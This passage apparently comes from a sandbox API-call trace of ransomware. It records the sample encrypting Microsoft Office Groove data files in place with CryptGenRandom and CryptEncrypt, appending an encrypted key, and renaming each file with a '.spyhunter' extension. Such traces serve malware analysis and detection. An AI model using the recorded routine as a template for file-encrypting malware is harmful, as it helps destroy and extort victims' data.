lpSrch=".txt") returned 0x0 [0108.429] GetProcessHeap () returned 0x2c0000 [0108.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0108.429] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fa74*=0x26d, lpOverlapped=0x0) returned 1 [0108.430] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.431] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fa74*=0x26d, lpOverlapped=0x0) returned 1 [0108.431] GetProcessHeap () returned 0x2c0000 [0108.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.431] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.431] WriteFile (in: hFile=0x178, lpBuffer=0x57fab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x57fab4*, lpNumberOfBytesWritten=0x57fa74*=0x4, lpOverlapped=0x0) returned 1 [0108.431] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa74*=0x30, lpOverlapped=0x0) returned 1 [0108.432] CloseHandle (hObject=0x178) returned 1 [0108.432] GetProcessHeap () returned 0x2c0000 [0108.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.432] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF.spyhunter") returned 105 [0108.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\save.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\save.gif.spyhunter")) returned 1 [0108.452] GetProcessHeap () returned 0x2c0000 [0108.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.452] GetProcessHeap () returned 0x2c0000 [0108.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0108.452] GetProcessHeap () returned 0x2c0000 [0108.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9400 | out: hHeap=0x2c0000) returned 1 [0108.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fab0 | out: pbBuffer=0x57fab0) returned 1 [0108.452] GetProcessHeap () returned 0x2c0000 [0108.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0108.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57faa8*=0x30) returned 1 [0108.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0108.510] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS") returned 94 [0108.510] StrStrW (lpFirst="FORM.JS", lpSrch=".txt") returned 0x0 [0108.510] GetProcessHeap () returned 0x2c0000 [0108.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0108.510] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0109.146] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.146] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0109.146] GetProcessHeap () returned 0x2c0000 [0109.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.147] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.147] WriteFile (in: hFile=0x16c, lpBuffer=0x57faac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x57faac*, lpNumberOfBytesWritten=0x57fa6c*=0x4, lpOverlapped=0x0) returned 1 [0109.223] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa6c*=0x30, lpOverlapped=0x0) returned 1 [0109.223] CloseHandle (hObject=0x16c) returned 1 [0109.226] GetProcessHeap () returned 0x2c0000 [0109.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.226] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS.spyhunter") returned 104 [0109.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FORM.JS.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\form.js.spyhunter")) returned 1 [0109.226] GetProcessHeap () returned 0x2c0000 [0109.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.227] GetProcessHeap () returned 0x2c0000 [0109.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.227] GetProcessHeap () returned 0x2c0000 [0109.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8fe0 | out: hHeap=0x2c0000) returned 1 [0109.227] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fab0 | out: pbBuffer=0x57fab0) returned 1 [0109.227] GetProcessHeap () returned 0x2c0000 [0109.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.227] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57faa8*=0x30) returned 1 [0109.227] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.256] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css") returned 112 [0109.256] StrStrW (lpFirst="GrayCheck.css", lpSrch=".txt") returned 0x0 [0109.256] GetProcessHeap () returned 0x2c0000 [0109.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.256] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa6c*=0xeb0, lpOverlapped=0x0) returned 1 [0109.276] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff150, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.276] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa6c*=0xeb0, lpOverlapped=0x0) returned 1 [0109.277] GetProcessHeap () returned 0x2c0000 [0109.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.277] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.277] WriteFile (in: hFile=0x178, lpBuffer=0x57faac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x57faac*, lpNumberOfBytesWritten=0x57fa6c*=0x4, lpOverlapped=0x0) returned 1 [0109.277] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa6c*=0x30, lpOverlapped=0x0) returned 1 [0109.277] CloseHandle (hObject=0x178) returned 1 [0109.277] GetProcessHeap () returned 0x2c0000 [0109.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.277] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css.spyhunter") returned 122 [0109.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck.css.spyhunter")) returned 1 [0109.278] GetProcessHeap () returned 0x2c0000 [0109.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.278] GetProcessHeap () returned 0x2c0000 [0109.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.278] GetProcessHeap () returned 0x2c0000 [0109.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b220 | out: hHeap=0x2c0000) returned 1 [0109.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faa8 | out: pbBuffer=0x57faa8) returned 1 [0109.279] GetProcessHeap () returned 0x2c0000 [0109.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.279] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57faa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57faa0*=0x30) returned 1 [0109.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slateblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.635] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css") returned 112 [0109.635] StrStrW (lpFirst="SlateBlue.css", lpSrch=".txt") returned 0x0 [0109.635] GetProcessHeap () returned 0x2c0000 [0109.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.635] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa64*=0x74a, lpOverlapped=0x0) returned 1 [0109.654] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff8b6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.654] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x74a, lpNumberOfBytesWritten=0x57fa64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa64*=0x74a, lpOverlapped=0x0) returned 1 [0109.654] GetProcessHeap () returned 0x2c0000 [0109.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.655] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.655] WriteFile (in: hFile=0x16c, lpBuffer=0x57faa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa64, lpOverlapped=0x0 | out: lpBuffer=0x57faa4*, lpNumberOfBytesWritten=0x57fa64*=0x4, lpOverlapped=0x0) returned 1 [0109.655] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa64*=0x30, lpOverlapped=0x0) returned 1 [0109.655] CloseHandle (hObject=0x16c) returned 1 [0109.659] GetProcessHeap () returned 0x2c0000 [0109.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e44b78 [0109.659] wnsprintfW (in: pszDest=0x2e44b78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css.spyhunter") returned 122 [0109.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slateblue.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slateblue.css.spyhunter")) returned 1 [0109.660] GetProcessHeap () returned 0x2c0000 [0109.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44b78 | out: hHeap=0x2c0000) returned 1 [0109.660] GetProcessHeap () returned 0x2c0000 [0109.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.660] GetProcessHeap () returned 0x2c0000 [0109.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31be50 | out: hHeap=0x2c0000) returned 1 [0109.661] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faa0 | out: pbBuffer=0x57faa0) returned 1 [0109.661] GetProcessHeap () returned 0x2c0000 [0109.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.661] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa98*=0x30) returned 1 [0109.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF") returned 118 [0109.662] StrStrW (lpFirst="TAB_ON.GIF", lpSrch=".txt") returned 0x0 [0109.662] GetProcessHeap () returned 0x2c0000 [0109.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.662] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa5c*=0xde, lpOverlapped=0x0) returned 1 [0109.663] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.663] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x57fa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa5c*=0xde, lpOverlapped=0x0) returned 1 [0109.663] GetProcessHeap () returned 0x2c0000 [0109.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.663] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.663] WriteFile (in: hFile=0x16c, lpBuffer=0x57fa9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa5c, lpOverlapped=0x0 | out: lpBuffer=0x57fa9c*, lpNumberOfBytesWritten=0x57fa5c*=0x4, lpOverlapped=0x0) returned 1 [0109.663] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa5c*=0x30, lpOverlapped=0x0) returned 1 [0109.664] CloseHandle (hObject=0x16c) returned 1 [0109.664] GetProcessHeap () returned 0x2c0000 [0109.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e44b78 [0109.664] wnsprintfW (in: pszDest=0x2e44b78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF.spyhunter") returned 128 [0109.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_on.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\TAB_ON.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\tab_on.gif.spyhunter")) returned 1 [0109.687] GetProcessHeap () returned 0x2c0000 [0109.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44b78 | out: hHeap=0x2c0000) returned 1 [0109.687] GetProcessHeap () returned 0x2c0000 [0109.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.687] GetProcessHeap () returned 0x2c0000 [0109.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bf88 | out: hHeap=0x2c0000) returned 1 [0109.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa98 | out: pbBuffer=0x57fa98) returned 1 [0109.787] GetProcessHeap () returned 0x2c0000 [0109.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.787] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa90*=0x30) returned 1 [0109.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0109.802] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp") returned 118 [0109.802] StrStrW (lpFirst="ProjectTaskIconMask.bmp", lpSrch=".txt") returned 0x0 [0109.802] GetProcessHeap () returned 0x2c0000 [0109.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0109.803] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa54*=0x79c, lpOverlapped=0x0) returned 1 [0109.845] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff864, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.845] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x79c, lpNumberOfBytesWritten=0x57fa54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa54*=0x79c, lpOverlapped=0x0) returned 1 [0109.846] GetProcessHeap () returned 0x2c0000 [0109.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0109.846] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.846] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa54, lpOverlapped=0x0 | out: lpBuffer=0x57fa94*, lpNumberOfBytesWritten=0x57fa54*=0x4, lpOverlapped=0x0) returned 1 [0109.846] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa54*=0x30, lpOverlapped=0x0) returned 1 [0109.846] CloseHandle (hObject=0x15c) returned 1 [0109.846] GetProcessHeap () returned 0x2c0000 [0109.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.846] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp.spyhunter") returned 128 [0109.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskiconmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskiconmask.bmp.spyhunter")) returned 1 [0109.847] GetProcessHeap () returned 0x2c0000 [0109.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.847] GetProcessHeap () returned 0x2c0000 [0109.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.847] GetProcessHeap () returned 0x2c0000 [0109.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e25c68 | out: hHeap=0x2c0000) returned 1 [0109.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa90 | out: pbBuffer=0x57fa90) returned 1 [0109.847] GetProcessHeap () returned 0x2c0000 [0109.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa88*=0x30) returned 1 [0109.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\toolicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0109.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO") returned 76 [0109.918] StrStrW (lpFirst="TOOLICON.ICO", lpSrch=".txt") returned 0x0 [0109.918] GetProcessHeap () returned 0x2c0000 [0109.918] RtlAllocateHeap 